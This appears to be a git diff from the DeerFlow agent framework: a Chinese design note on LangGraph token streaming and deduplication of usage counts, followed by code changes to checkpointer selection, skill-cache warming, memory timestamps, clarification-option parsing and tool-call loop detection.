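def emit_full_message(msg) -> None:  # 占位:合成一条完整 messages-tuple 事件
    print("full:", getattr(msg, "content", ""))


def account_usage(msg) -> None:
    usage = getattr(msg, "usage_metadata", None)
    if not usage or msg.id in counted_usage_ids:
        return                               # 同一条消息的 usage 只累计一次
    counted_usage_ids.add(msg.id)
    for key, value in usage.items():
        if isinstance(value, int):
            total_usage[key] = total_usage.get(key, 0) + value


def on_messages_chunk(msg) -> None:
    account_usage(msg)                       # usage 可能挂在最后一个空 chunk 上
    if getattr(msg, "content", ""):
        streamed_ids.add(msg.id)             # 标记"已 token 级流过"
        emit_token_delta(msg)


def on_values_snapshot(state: dict) -> None:
    for msg in state.get("messages", []):
        account_usage(msg)                   # values 里重复出现的 usage 是 no-op
        if msg.id in seen_ids:
            continue                         # 连续快照里同一条消息只处理一次
        seen_ids.add(msg.id)
        if msg.id not in streamed_ids:
            emit_full_message(msg)           # 没有流过的消息才合成完整事件
```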
|
||||
|
||||
---
|
||||
|
||||
## 端到端:一次真实对话的事件时序
|
||||
|
||||
假设调用 `client.stream("Count from 1 to 15")`,LLM 给出 "one\ntwo\n...\nfifteen"(88 字符),tokenizer 把它拆成 ~35 个 BPE chunk。下面是事件到达序列的精简版:
|
||||
|
||||
```mermaid
|
||||
sequenceDiagram
|
||||
participant U as User
|
||||
participant C as DeerFlowClient
|
||||
participant A as LangGraph<br/>agent.stream
|
||||
|
||||
U->>C: stream("Count ... 15")
|
||||
C->>A: stream(mode=["values","messages","custom"])
|
||||
|
||||
A-->>C: ("values", {messages: [HumanMessage]})
|
||||
C-->>U: StreamEvent(type="values", ...)
|
||||
|
||||
Note over A,C: LLM 开始 yield token
|
||||
loop 35 次,约 476ms
|
||||
A-->>C: ("messages", (AIMessageChunk(content="ele"), meta))
|
||||
C->>C: streamed_ids.add(ai-1)
|
||||
C-->>U: StreamEvent(type="messages-tuple",<br/>data={type:ai, content:"ele", id:ai-1})
|
||||
end
|
||||
|
||||
Note over A: LLM finish_reason=stop,最后一个 chunk 带 usage
|
||||
A-->>C: ("messages", (AIMessageChunk(content="", usage_metadata={...}), meta))
|
||||
C->>C: counted_usage_ids.add(ai-1)<br/>(无文本,不 yield)
|
||||
|
||||
A-->>C: ("values", {messages: [..., AIMessage(complete)]})
|
||||
C->>C: ai-1 in streamed_ids → 跳过合成
|
||||
C->>C: 捕获 usage (已在 counted_usage_ids,no-op)
|
||||
C-->>U: StreamEvent(type="values", ...)
|
||||
|
||||
C-->>U: StreamEvent(type="end", data={usage:{...}})
|
||||
```
|
||||
|
||||
关键观察:
|
||||
|
||||
1. 用户看到 **35 个 messages-tuple 事件**,跨越约 476ms,每个事件带一个 token delta 和同一个 `id=ai-1`。
|
||||
2. 最后一个 `values` 快照里的 `AIMessage` **不会**再触发一个完整的 `messages-tuple` 事件——因为 `ai-1 in streamed_ids` 跳过了合成。
|
||||
3. `end` 事件里的 `usage` 正好等于那一份 cumulative usage,**不是它的两倍**——`counted_usage_ids` 在 messages 末尾 chunk 上已经吸收了,values 分支的重复访问是 no-op。
|
||||
4. 消费者拿到的 `content` 是**增量**:"ele" 只包含 3 个字符,不是 "one\ntwo\n...ele"。想要完整文本要按 `id` 累加,`chat()` 已经帮你做了。
|
||||
|
||||
---
|
||||
|
||||
## 为什么这个设计容易出 bug,以及测试策略
|
||||
|
||||
本文档的直接起因是 bytedance/deer-flow#1969:`DeerFlowClient.stream()` 原本只订阅 `["values", "custom"]`,**漏了 `"messages"`**。结果 `client.stream("hello")` 等价于一次性返回,视觉上和 `chat()` 没区别。
|
||||
|
||||
这类 bug 有三个结构性原因:
|
||||
|
||||
1. **多协议层命名**:`messages` / `messages-tuple` / HTTP SSE `messages` 是同一概念的三个名字。在其中一层出错不会在另外两层报错。
|
||||
2. **多消费者模型**:Gateway 和 DeerFlowClient 是两套独立实现,**没有单一的"订阅哪些 mode"的 single source of truth**。前者订阅对了不代表后者也订阅对了。
|
||||
3. **mock 测试绕开了真实路径**:老测试用 `agent.stream.return_value = iter([dict_chunk, ...])` 喂 values 形状的 dict 模拟 state 快照。这样构造的输入**永远不会进入 `messages` mode 分支**,所以即使 `stream_mode` 里少一个元素,CI 依然全绿。
|
||||
|
||||
### 防御手段
|
||||
|
||||
真正的防线是**显式断言 "messages" mode 被订阅 + 用真实 chunk shape mock**:
|
||||
|
||||
```python
|
||||
# tests/test_client.py::test_messages_mode_emits_token_deltas
|
||||
agent.stream.return_value = iter([
|
||||
("messages", (AIMessageChunk(content="Hel", id="ai-1"), {})),
|
||||
("messages", (AIMessageChunk(content="lo ", id="ai-1"), {})),
|
||||
("messages", (AIMessageChunk(content="world!", id="ai-1"), {})),
|
||||
("values", {"messages": [HumanMessage(...), AIMessage(content="Hello world!", id="ai-1")]}),
|
||||
])
|
||||
# ...
|
||||
assert [e.data["content"] for e in ai_text_events] == ["Hel", "lo ", "world!"]
|
||||
assert len(ai_text_events) == 3 # values snapshot must NOT re-synthesize
|
||||
assert "messages" in agent.stream.call_args.kwargs["stream_mode"]
|
||||
```
|
||||
|
||||
**为什么这比"抽一个共享常量"更有效**:共享常量只能保证"用它的人写对字符串",但新增消费者的人可能根本不知道常量在哪。行为断言强制任何改动都要穿过**实际执行路径**,改回 `["values", "custom"]` 会立刻让 `assert "messages" in ...` 失败。
|
||||
|
||||
### 活体信号:BPE 子词边界
|
||||
|
||||
回归的最终验证是让真实 LLM 数 1-15,然后看是否能在输出里看到 tokenizer 的子词切分:
|
||||
|
||||
```
|
||||
[5.460s] 'ele' / 'ven' eleven 被拆成两个 token
|
||||
[5.508s] 'tw' / 'elve' twelve 拆两个
|
||||
[5.568s] 'th' / 'irteen' thirteen 拆两个
|
||||
[5.623s] 'four'/ 'teen' fourteen 拆两个
|
||||
[5.677s] 'f' / 'if' / 'teen' fifteen 拆三个
|
||||
```
|
||||
|
||||
子词切分是 tokenizer 的外部事实,**无法伪造**。能看到它就说明数据流**逐 chunk** 地穿过了整条管道,没有被任何中间层缓冲成整段。这种"活体信号"在流式系统里是比单元测试更高置信度的证据。
|
||||
|
||||
---
|
||||
|
||||
## 相关源码定位
|
||||
|
||||
| 关心什么 | 看这里 |
|
||||
|---|---|
|
||||
| DeerFlowClient 嵌入式流 | `packages/harness/deerflow/client.py::DeerFlowClient.stream` |
|
||||
| `chat()` 的 delta 累加器 | `packages/harness/deerflow/client.py::DeerFlowClient.chat` |
|
||||
| Gateway async 流 | `packages/harness/deerflow/runtime/runs/worker.py::run_agent` |
|
||||
| HTTP SSE 帧输出 | `app/gateway/services.py::sse_consumer` / `format_sse` |
|
||||
| 序列化到 wire 格式 | `packages/harness/deerflow/runtime/serialization.py` |
|
||||
| LangGraph mode 命名翻译 | `packages/harness/deerflow/runtime/runs/worker.py:117-121` |
|
||||
| 飞书渠道的增量卡片更新 | `app/channels/manager.py::_handle_streaming_chat` |
|
||||
| Channels 自带的 delta/cumulative 防御性累加 | `app/channels/manager.py::_merge_stream_text` |
|
||||
| Frontend useStream 支持的 mode 集合 | `frontend/src/core/api/stream-mode.ts` |
|
||||
| 核心回归测试 | `backend/tests/test_client.py::TestStream::test_messages_mode_emits_token_deltas` |
|
||||
@@ -8,6 +8,9 @@
|
||||
"graphs": {
|
||||
"lead_agent": "deerflow.agents:make_lead_agent"
|
||||
},
|
||||
"auth": {
|
||||
"path": "./app/gateway/langgraph_auth.py:auth"
|
||||
},
|
||||
"checkpointer": {
|
||||
"path": "./packages/harness/deerflow/agents/checkpointer/async_provider.py:make_checkpointer"
|
||||
}
|
||||
|
||||
@@ -2,8 +2,14 @@ from .checkpointer import get_checkpointer, make_checkpointer, reset_checkpointe
|
||||
from .factory import create_deerflow_agent
|
||||
from .features import Next, Prev, RuntimeFeatures
|
||||
from .lead_agent import make_lead_agent
|
||||
from .lead_agent.prompt import prime_enabled_skills_cache
|
||||
from .thread_state import SandboxState, ThreadState
|
||||
|
||||
# LangGraph imports deerflow.agents when registering the graph. Prime the
|
||||
# enabled-skills cache here so the request path can usually read a warm cache
|
||||
# without forcing synchronous filesystem work during prompt module import.
|
||||
prime_enabled_skills_cache()
|
||||
|
||||
__all__ = [
|
||||
"create_deerflow_agent",
|
||||
"RuntimeFeatures",
|
||||
|
||||
@@ -17,6 +17,7 @@ For sync usage see :mod:`deerflow.agents.checkpointer.provider`.
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import contextlib
|
||||
import logging
|
||||
from collections.abc import AsyncIterator
|
||||
@@ -54,7 +55,7 @@ async def _async_checkpointer(config) -> AsyncIterator[Checkpointer]:
|
||||
raise ImportError(SQLITE_INSTALL) from exc
|
||||
|
||||
conn_str = resolve_sqlite_conn_str(config.connection_string or "store.db")
|
||||
ensure_sqlite_parent_dir(conn_str)
|
||||
await asyncio.to_thread(ensure_sqlite_parent_dir, conn_str)
|
||||
async with AsyncSqliteSaver.from_conn_string(conn_str) as saver:
|
||||
await saver.setup()
|
||||
yield saver
|
||||
@@ -83,23 +84,76 @@ async def _async_checkpointer(config) -> AsyncIterator[Checkpointer]:
|
||||
|
||||
|
||||
@contextlib.asynccontextmanager
|
||||
async def make_checkpointer() -> AsyncIterator[Checkpointer]:
|
||||
"""Async context manager that yields a checkpointer for the caller's lifetime.
|
||||
Resources are opened on enter and closed on exit — no global state::
|
||||
|
||||
async with make_checkpointer() as checkpointer:
|
||||
app.state.checkpointer = checkpointer
|
||||
|
||||
Yields an ``InMemorySaver`` when no checkpointer is configured in *config.yaml*.
|
||||
"""
|
||||
|
||||
config = get_app_config()
|
||||
|
||||
if config.checkpointer is None:
|
||||
async def _async_checkpointer_from_database(db_config) -> AsyncIterator[Checkpointer]:
|
||||
"""Async context manager that constructs a checkpointer from unified DatabaseConfig."""
|
||||
if db_config.backend == "memory":
|
||||
from langgraph.checkpoint.memory import InMemorySaver
|
||||
|
||||
yield InMemorySaver()
|
||||
return
|
||||
|
||||
async with _async_checkpointer(config.checkpointer) as saver:
|
||||
yield saver
|
||||
if db_config.backend == "sqlite":
|
||||
try:
|
||||
from langgraph.checkpoint.sqlite.aio import AsyncSqliteSaver
|
||||
except ImportError as exc:
|
||||
raise ImportError(SQLITE_INSTALL) from exc
|
||||
|
||||
conn_str = db_config.checkpointer_sqlite_path
|
||||
ensure_sqlite_parent_dir(conn_str)
|
||||
async with AsyncSqliteSaver.from_conn_string(conn_str) as saver:
|
||||
await saver.setup()
|
||||
yield saver
|
||||
return
|
||||
|
||||
if db_config.backend == "postgres":
|
||||
try:
|
||||
from langgraph.checkpoint.postgres.aio import AsyncPostgresSaver
|
||||
except ImportError as exc:
|
||||
raise ImportError(POSTGRES_INSTALL) from exc
|
||||
|
||||
if not db_config.postgres_url:
|
||||
raise ValueError("database.postgres_url is required for the postgres backend")
|
||||
|
||||
async with AsyncPostgresSaver.from_conn_string(db_config.postgres_url) as saver:
|
||||
await saver.setup()
|
||||
yield saver
|
||||
return
|
||||
|
||||
raise ValueError(f"Unknown database backend: {db_config.backend!r}")
|
||||
|
||||
|
||||
@contextlib.asynccontextmanager
|
||||
async def make_checkpointer() -> AsyncIterator[Checkpointer]:
|
||||
"""Async context manager that yields a checkpointer for the caller's lifetime.
|
||||
Resources are opened on enter and closed on exit -- no global state::
|
||||
|
||||
async with make_checkpointer() as checkpointer:
|
||||
app.state.checkpointer = checkpointer
|
||||
|
||||
Yields an ``InMemorySaver`` when no checkpointer is configured in *config.yaml*.
|
||||
|
||||
Priority:
|
||||
1. Legacy ``checkpointer:`` config section (backward compatible)
|
||||
2. Unified ``database:`` config section
|
||||
3. Default InMemorySaver
|
||||
"""
|
||||
|
||||
config = get_app_config()
|
||||
|
||||
# Legacy: standalone checkpointer config takes precedence
|
||||
if config.checkpointer is not None:
|
||||
async with _async_checkpointer(config.checkpointer) as saver:
|
||||
yield saver
|
||||
return
|
||||
|
||||
# Unified database config
|
||||
db_config = getattr(config, "database", None)
|
||||
if db_config is not None and db_config.backend != "memory":
|
||||
async with _async_checkpointer_from_database(db_config) as saver:
|
||||
yield saver
|
||||
return
|
||||
|
||||
# Default: in-memory
|
||||
from langgraph.checkpoint.memory import InMemorySaver
|
||||
|
||||
yield InMemorySaver()
|
||||
|
||||
@@ -56,13 +56,15 @@ def _create_summarization_middleware() -> SummarizationMiddleware | None:
|
||||
# Prepare keep parameter
|
||||
keep = config.keep.to_tuple()
|
||||
|
||||
# Prepare model parameter
|
||||
# Prepare model parameter.
|
||||
# Bind "middleware:summarize" tag so RunJournal identifies these LLM calls
|
||||
# as middleware rather than lead_agent (SummarizationMiddleware is a
|
||||
# LangChain built-in, so we tag the model at creation time).
|
||||
if config.model_name:
|
||||
model = create_chat_model(name=config.model_name, thinking_enabled=False)
|
||||
else:
|
||||
# Use a lightweight model for summarization to save costs
|
||||
# Falls back to default model if not explicitly specified
|
||||
model = create_chat_model(thinking_enabled=False)
|
||||
model = model.with_config(tags=["middleware:summarize"])
|
||||
|
||||
# Prepare kwargs
|
||||
kwargs = {
|
||||
@@ -287,14 +289,14 @@ def make_lead_agent(config: RunnableConfig):
|
||||
agent_name = cfg.get("agent_name")
|
||||
|
||||
agent_config = load_agent_config(agent_name) if not is_bootstrap else None
|
||||
# Custom agent model or fallback to global/default model resolution
|
||||
agent_model_name = agent_config.model if agent_config and agent_config.model else _resolve_model_name()
|
||||
# Custom agent model from agent config (if any), or None to let _resolve_model_name pick the default
|
||||
agent_model_name = agent_config.model if agent_config and agent_config.model else None
|
||||
|
||||
# Final model name resolution with request override, then agent config, then global default
|
||||
model_name = requested_model_name or agent_model_name
|
||||
# Final model name resolution: request → agent config → global default, with fallback for unknown names
|
||||
model_name = _resolve_model_name(requested_model_name or agent_model_name)
|
||||
|
||||
app_config = get_app_config()
|
||||
model_config = app_config.get_model_config(model_name) if model_name else None
|
||||
model_config = app_config.get_model_config(model_name)
|
||||
|
||||
if model_config is None:
|
||||
raise ValueError("No chat model could be resolved. Please configure at least one model in config.yaml or provide a valid 'model_name'/'model' in the request.")
|
||||
|
||||
@@ -1,20 +1,167 @@
|
||||
import asyncio
|
||||
import logging
|
||||
import threading
|
||||
from datetime import datetime
|
||||
from functools import lru_cache
|
||||
|
||||
from deerflow.config.agents_config import load_agent_soul
|
||||
from deerflow.skills import load_skills
|
||||
from deerflow.skills.types import Skill
|
||||
from deerflow.subagents import get_available_subagent_names
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
_ENABLED_SKILLS_REFRESH_WAIT_TIMEOUT_SECONDS = 5.0
|
||||
_enabled_skills_lock = threading.Lock()
|
||||
_enabled_skills_cache: list[Skill] | None = None
|
||||
_enabled_skills_refresh_active = False
|
||||
_enabled_skills_refresh_version = 0
|
||||
_enabled_skills_refresh_event = threading.Event()
|
||||
|
||||
|
||||
def _load_enabled_skills_sync() -> list[Skill]:
|
||||
return list(load_skills(enabled_only=True))
|
||||
|
||||
|
||||
def _start_enabled_skills_refresh_thread() -> None:
|
||||
threading.Thread(
|
||||
target=_refresh_enabled_skills_cache_worker,
|
||||
name="deerflow-enabled-skills-loader",
|
||||
daemon=True,
|
||||
).start()
|
||||
|
||||
|
||||
def _refresh_enabled_skills_cache_worker() -> None:
|
||||
global _enabled_skills_cache, _enabled_skills_refresh_active
|
||||
|
||||
while True:
|
||||
with _enabled_skills_lock:
|
||||
target_version = _enabled_skills_refresh_version
|
||||
|
||||
try:
|
||||
skills = _load_enabled_skills_sync()
|
||||
except Exception:
|
||||
logger.exception("Failed to load enabled skills for prompt injection")
|
||||
skills = []
|
||||
|
||||
with _enabled_skills_lock:
|
||||
if _enabled_skills_refresh_version == target_version:
|
||||
_enabled_skills_cache = skills
|
||||
_enabled_skills_refresh_active = False
|
||||
_enabled_skills_refresh_event.set()
|
||||
return
|
||||
|
||||
# A newer invalidation happened while loading. Keep the worker alive
|
||||
# and loop again so the cache always converges on the latest version.
|
||||
_enabled_skills_cache = None
|
||||
|
||||
|
||||
def _ensure_enabled_skills_cache() -> threading.Event:
|
||||
global _enabled_skills_refresh_active
|
||||
|
||||
with _enabled_skills_lock:
|
||||
if _enabled_skills_cache is not None:
|
||||
_enabled_skills_refresh_event.set()
|
||||
return _enabled_skills_refresh_event
|
||||
if _enabled_skills_refresh_active:
|
||||
return _enabled_skills_refresh_event
|
||||
_enabled_skills_refresh_active = True
|
||||
_enabled_skills_refresh_event.clear()
|
||||
|
||||
_start_enabled_skills_refresh_thread()
|
||||
return _enabled_skills_refresh_event
|
||||
|
||||
|
||||
def _invalidate_enabled_skills_cache() -> threading.Event:
|
||||
global _enabled_skills_cache, _enabled_skills_refresh_active, _enabled_skills_refresh_version
|
||||
|
||||
_get_cached_skills_prompt_section.cache_clear()
|
||||
with _enabled_skills_lock:
|
||||
_enabled_skills_cache = None
|
||||
_enabled_skills_refresh_version += 1
|
||||
_enabled_skills_refresh_event.clear()
|
||||
if _enabled_skills_refresh_active:
|
||||
return _enabled_skills_refresh_event
|
||||
_enabled_skills_refresh_active = True
|
||||
|
||||
_start_enabled_skills_refresh_thread()
|
||||
return _enabled_skills_refresh_event
|
||||
|
||||
|
||||
def prime_enabled_skills_cache() -> None:
|
||||
_ensure_enabled_skills_cache()
|
||||
|
||||
|
||||
def warm_enabled_skills_cache(timeout_seconds: float = _ENABLED_SKILLS_REFRESH_WAIT_TIMEOUT_SECONDS) -> bool:
|
||||
if _ensure_enabled_skills_cache().wait(timeout=timeout_seconds):
|
||||
return True
|
||||
|
||||
logger.warning("Timed out waiting %.1fs for enabled skills cache warm-up", timeout_seconds)
|
||||
return False
|
||||
|
||||
|
||||
def _get_enabled_skills():
|
||||
with _enabled_skills_lock:
|
||||
cached = _enabled_skills_cache
|
||||
|
||||
if cached is not None:
|
||||
return list(cached)
|
||||
|
||||
_ensure_enabled_skills_cache()
|
||||
return []
|
||||
|
||||
|
||||
def _skill_mutability_label(category: str) -> str:
|
||||
return "[custom, editable]" if category == "custom" else "[built-in]"
|
||||
|
||||
|
||||
def clear_skills_system_prompt_cache() -> None:
|
||||
_invalidate_enabled_skills_cache()
|
||||
|
||||
|
||||
async def refresh_skills_system_prompt_cache_async() -> None:
|
||||
await asyncio.to_thread(_invalidate_enabled_skills_cache().wait)
|
||||
|
||||
|
||||
def _reset_skills_system_prompt_cache_state() -> None:
|
||||
global _enabled_skills_cache, _enabled_skills_refresh_active, _enabled_skills_refresh_version
|
||||
|
||||
_get_cached_skills_prompt_section.cache_clear()
|
||||
with _enabled_skills_lock:
|
||||
_enabled_skills_cache = None
|
||||
_enabled_skills_refresh_active = False
|
||||
_enabled_skills_refresh_version = 0
|
||||
_enabled_skills_refresh_event.clear()
|
||||
|
||||
|
||||
def _refresh_enabled_skills_cache() -> None:
|
||||
"""Backward-compatible test helper for direct synchronous reload."""
|
||||
try:
|
||||
return list(load_skills(enabled_only=True))
|
||||
skills = _load_enabled_skills_sync()
|
||||
except Exception:
|
||||
logger.exception("Failed to load enabled skills for prompt injection")
|
||||
return []
|
||||
skills = []
|
||||
|
||||
with _enabled_skills_lock:
|
||||
_enabled_skills_cache = skills
|
||||
_enabled_skills_refresh_active = False
|
||||
_enabled_skills_refresh_event.set()
|
||||
|
||||
|
||||
def _build_skill_evolution_section(skill_evolution_enabled: bool) -> str:
|
||||
if not skill_evolution_enabled:
|
||||
return ""
|
||||
return """
|
||||
## Skill Self-Evolution
|
||||
After completing a task, consider creating or updating a skill when:
|
||||
- The task required 5+ tool calls to resolve
|
||||
- You overcame non-obvious errors or pitfalls
|
||||
- The user corrected your approach and the corrected version worked
|
||||
- You discovered a non-trivial, recurring workflow
|
||||
If you used a skill and encountered issues not covered by it, patch it immediately.
|
||||
Prefer patch over edit. Before creating a new skill, confirm with the user first.
|
||||
Skip simple one-off tasks.
|
||||
"""
|
||||
|
||||
|
||||
def _skill_mutability_label(category: str) -> str:
|
||||
@@ -294,6 +441,9 @@ You: "Deploying to staging..." [proceed]
|
||||
- Use `read_file` tool to read uploaded files using their paths from the list
|
||||
- For PDF, PPT, Excel, and Word files, converted Markdown versions (*.md) are available alongside originals
|
||||
- All temporary work happens in `/mnt/user-data/workspace`
|
||||
- Treat `/mnt/user-data/workspace` as your default current working directory for coding and file-editing tasks
|
||||
- When writing scripts or commands that create/read files from the workspace, prefer relative paths such as `hello.txt`, `../uploads/data.csv`, and `../outputs/report.md`
|
||||
- Avoid hardcoding `/mnt/user-data/...` inside generated scripts when a relative path from the workspace is enough
|
||||
- Final deliverables must be copied to `/mnt/user-data/outputs` and presented using `present_file` tool
|
||||
{acp_section}
|
||||
</working_directory>
|
||||
|
||||
@@ -4,7 +4,7 @@ import logging
|
||||
import threading
|
||||
import time
|
||||
from dataclasses import dataclass, field
|
||||
from datetime import datetime
|
||||
from datetime import UTC, datetime
|
||||
from typing import Any
|
||||
|
||||
from deerflow.config.memory_config import get_memory_config
|
||||
@@ -18,7 +18,7 @@ class ConversationContext:
|
||||
|
||||
thread_id: str
|
||||
messages: list[Any]
|
||||
timestamp: datetime = field(default_factory=datetime.utcnow)
|
||||
timestamp: datetime = field(default_factory=lambda: datetime.now(UTC))
|
||||
agent_name: str | None = None
|
||||
correction_detected: bool = False
|
||||
reinforcement_detected: bool = False
|
||||
|
||||
@@ -4,7 +4,7 @@ import abc
|
||||
import json
|
||||
import logging
|
||||
import threading
|
||||
from datetime import datetime
|
||||
from datetime import UTC, datetime
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
|
||||
@@ -15,11 +15,16 @@ from deerflow.config.paths import get_paths
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
def utc_now_iso_z() -> str:
|
||||
"""Current UTC time as ISO-8601 with ``Z`` suffix (matches prior naive-UTC output)."""
|
||||
return datetime.now(UTC).isoformat().removesuffix("+00:00") + "Z"
|
||||
|
||||
|
||||
def create_empty_memory() -> dict[str, Any]:
|
||||
"""Create an empty memory structure."""
|
||||
return {
|
||||
"version": "1.0",
|
||||
"lastUpdated": datetime.utcnow().isoformat() + "Z",
|
||||
"lastUpdated": utc_now_iso_z(),
|
||||
"user": {
|
||||
"workContext": {"summary": "", "updatedAt": ""},
|
||||
"personalContext": {"summary": "", "updatedAt": ""},
|
||||
@@ -137,7 +142,7 @@ class FileMemoryStorage(MemoryStorage):
|
||||
|
||||
try:
|
||||
file_path.parent.mkdir(parents=True, exist_ok=True)
|
||||
memory_data["lastUpdated"] = datetime.utcnow().isoformat() + "Z"
|
||||
memory_data["lastUpdated"] = utc_now_iso_z()
|
||||
|
||||
temp_path = file_path.with_suffix(".tmp")
|
||||
with open(temp_path, "w", encoding="utf-8") as f:
|
||||
|
||||
@@ -5,14 +5,17 @@ import logging
|
||||
import math
|
||||
import re
|
||||
import uuid
|
||||
from datetime import datetime
|
||||
from typing import Any
|
||||
|
||||
from deerflow.agents.memory.prompt import (
|
||||
MEMORY_UPDATE_PROMPT,
|
||||
format_conversation_for_update,
|
||||
)
|
||||
from deerflow.agents.memory.storage import create_empty_memory, get_memory_storage
|
||||
from deerflow.agents.memory.storage import (
|
||||
create_empty_memory,
|
||||
get_memory_storage,
|
||||
utc_now_iso_z,
|
||||
)
|
||||
from deerflow.config.memory_config import get_memory_config
|
||||
from deerflow.models import create_chat_model
|
||||
|
||||
@@ -86,7 +89,7 @@ def create_memory_fact(
|
||||
|
||||
normalized_category = category.strip() or "context"
|
||||
validated_confidence = _validate_confidence(confidence)
|
||||
now = datetime.utcnow().isoformat() + "Z"
|
||||
now = utc_now_iso_z()
|
||||
memory_data = get_memory_data(agent_name)
|
||||
updated_memory = dict(memory_data)
|
||||
facts = list(memory_data.get("facts", []))
|
||||
@@ -376,7 +379,7 @@ class MemoryUpdater:
|
||||
Updated memory data.
|
||||
"""
|
||||
config = get_memory_config()
|
||||
now = datetime.utcnow().isoformat() + "Z"
|
||||
now = utc_now_iso_z()
|
||||
|
||||
# Update user sections
|
||||
user_updates = update_data.get("user", {})
|
||||
|
||||
@@ -1,5 +1,6 @@
|
||||
"""Middleware for intercepting clarification requests and presenting them to the user."""
|
||||
|
||||
import json
|
||||
import logging
|
||||
from collections.abc import Callable
|
||||
from typing import override
|
||||
@@ -60,6 +61,20 @@ class ClarificationMiddleware(AgentMiddleware[ClarificationMiddlewareState]):
|
||||
context = args.get("context")
|
||||
options = args.get("options", [])
|
||||
|
||||
# Some models (e.g. Qwen3-Max) serialize array parameters as JSON strings
|
||||
# instead of native arrays. Deserialize and normalize so `options`
|
||||
# is always a list for the rendering logic below.
|
||||
if isinstance(options, str):
|
||||
try:
|
||||
options = json.loads(options)
|
||||
except (json.JSONDecodeError, TypeError):
|
||||
options = [options]
|
||||
|
||||
if options is None:
|
||||
options = []
|
||||
elif not isinstance(options, list):
|
||||
options = [options]
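For reference, the same normalization rule as a standalone sketch (the helper name is hypothetical, not part of the middleware):

```
import json

def normalize_options(options):
    """Coerce options into a list: JSON-string arrays are parsed, scalars are wrapped."""
    if isinstance(options, str):
        try:
            options = json.loads(options)
        except (json.JSONDecodeError, TypeError):
            options = [options]
    if options is None:
        return []
    return options if isinstance(options, list) else [options]

assert normalize_options('["a", "b"]') == ["a", "b"]  # JSON-string array, e.g. from Qwen3-Max
assert normalize_options("yes") == ["yes"]            # plain string wrapped in a list
assert normalize_options(None) == []
```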
# Type-specific icons
|
||||
type_icons = {
|
||||
"missing_info": "❓",
|
||||
|
||||
@@ -33,30 +33,92 @@ _DEFAULT_WINDOW_SIZE = 20 # track last N tool calls
|
||||
_DEFAULT_MAX_TRACKED_THREADS = 100 # LRU eviction limit
|
||||
|
||||
|
||||
def _normalize_tool_call_args(raw_args: object) -> tuple[dict, str | None]:
|
||||
"""Normalize tool call args to a dict plus an optional fallback key.
|
||||
|
||||
Some providers serialize ``args`` as a JSON string instead of a dict.
|
||||
We defensively parse those cases so loop detection does not crash while
|
||||
still preserving a stable fallback key for non-dict payloads.
|
||||
"""
|
||||
if isinstance(raw_args, dict):
|
||||
return raw_args, None
|
||||
|
||||
if isinstance(raw_args, str):
|
||||
try:
|
||||
parsed = json.loads(raw_args)
|
||||
except (TypeError, ValueError, json.JSONDecodeError):
|
||||
return {}, raw_args
|
||||
|
||||
if isinstance(parsed, dict):
|
||||
return parsed, None
|
||||
return {}, json.dumps(parsed, sort_keys=True, default=str)
|
||||
|
||||
if raw_args is None:
|
||||
return {}, None
|
||||
|
||||
return {}, json.dumps(raw_args, sort_keys=True, default=str)
|
||||
|
||||
|
||||
def _stable_tool_key(name: str, args: dict, fallback_key: str | None) -> str:
|
||||
"""Derive a stable key from salient args without overfitting to noise."""
|
||||
if name == "read_file" and fallback_key is None:
|
||||
path = args.get("path") or ""
|
||||
start_line = args.get("start_line")
|
||||
end_line = args.get("end_line")
|
||||
|
||||
bucket_size = 200
|
||||
try:
|
||||
start_line = int(start_line) if start_line is not None else 1
|
||||
except (TypeError, ValueError):
|
||||
start_line = 1
|
||||
try:
|
||||
end_line = int(end_line) if end_line is not None else start_line
|
||||
except (TypeError, ValueError):
|
||||
end_line = start_line
|
||||
|
||||
start_line, end_line = sorted((start_line, end_line))
|
||||
bucket_start = max(start_line, 1)
|
||||
bucket_end = max(end_line, 1)
|
||||
bucket_start = (bucket_start - 1) // bucket_size
|
||||
bucket_end = (bucket_end - 1) // bucket_size
|
||||
return f"{path}:{bucket_start}-{bucket_end}"
|
||||
|
||||
# write_file / str_replace are content-sensitive: same path may be updated
|
||||
# with different payloads during iteration. Using only salient fields (path)
|
||||
# can collapse distinct calls, so we hash full args to reduce false positives.
|
||||
if name in {"write_file", "str_replace"}:
|
||||
if fallback_key is not None:
|
||||
return fallback_key
|
||||
return json.dumps(args, sort_keys=True, default=str)
|
||||
|
||||
salient_fields = ("path", "url", "query", "command", "pattern", "glob", "cmd")
|
||||
stable_args = {field: args[field] for field in salient_fields if args.get(field) is not None}
|
||||
if stable_args:
|
||||
return json.dumps(stable_args, sort_keys=True, default=str)
|
||||
|
||||
if fallback_key is not None:
|
||||
return fallback_key
|
||||
|
||||
return json.dumps(args, sort_keys=True, default=str)
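To make the read_file bucketing concrete, a small sketch of the arithmetic (the path and line ranges are made up):

```
bucket_size = 200
# Near-identical re-reads of the same region collapse to one key, so they count
# toward loop detection; a read further down the file produces a different key.
for start, end in [(1, 150), (40, 180), (201, 380)]:
    bucket_start = (max(start, 1) - 1) // bucket_size
    bucket_end = (max(end, 1) - 1) // bucket_size
    print(f"src/app.py:{bucket_start}-{bucket_end}")
# -> src/app.py:0-0, src/app.py:0-0, src/app.py:1-1
```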
def _hash_tool_calls(tool_calls: list[dict]) -> str:
|
||||
"""Deterministic hash of a set of tool calls (name + args).
|
||||
"""Deterministic hash of a set of tool calls (name + stable key).
|
||||
|
||||
This is intended to be order-independent: the same multiset of tool calls
|
||||
should always produce the same hash, regardless of their input order.
|
||||
"""
|
||||
# First normalize each tool call to a minimal (name, args) structure.
|
||||
normalized: list[dict] = []
|
||||
# Normalize each tool call to a stable (name, key) structure.
|
||||
normalized: list[str] = []
|
||||
for tc in tool_calls:
|
||||
normalized.append(
|
||||
{
|
||||
"name": tc.get("name", ""),
|
||||
"args": tc.get("args", {}),
|
||||
}
|
||||
)
|
||||
name = tc.get("name", "")
|
||||
args, fallback_key = _normalize_tool_call_args(tc.get("args", {}))
|
||||
key = _stable_tool_key(name, args, fallback_key)
|
||||
|
||||
# Sort by both name and a deterministic serialization of args so that
|
||||
# permutations of the same multiset of calls yield the same ordering.
|
||||
normalized.sort(
|
||||
key=lambda tc: (
|
||||
tc["name"],
|
||||
json.dumps(tc["args"], sort_keys=True, default=str),
|
||||
)
|
||||
)
|
||||
normalized.append(f"{name}:{key}")
|
||||
|
||||
# Sort so permutations of the same multiset of calls yield the same ordering.
|
||||
normalized.sort()
|
||||
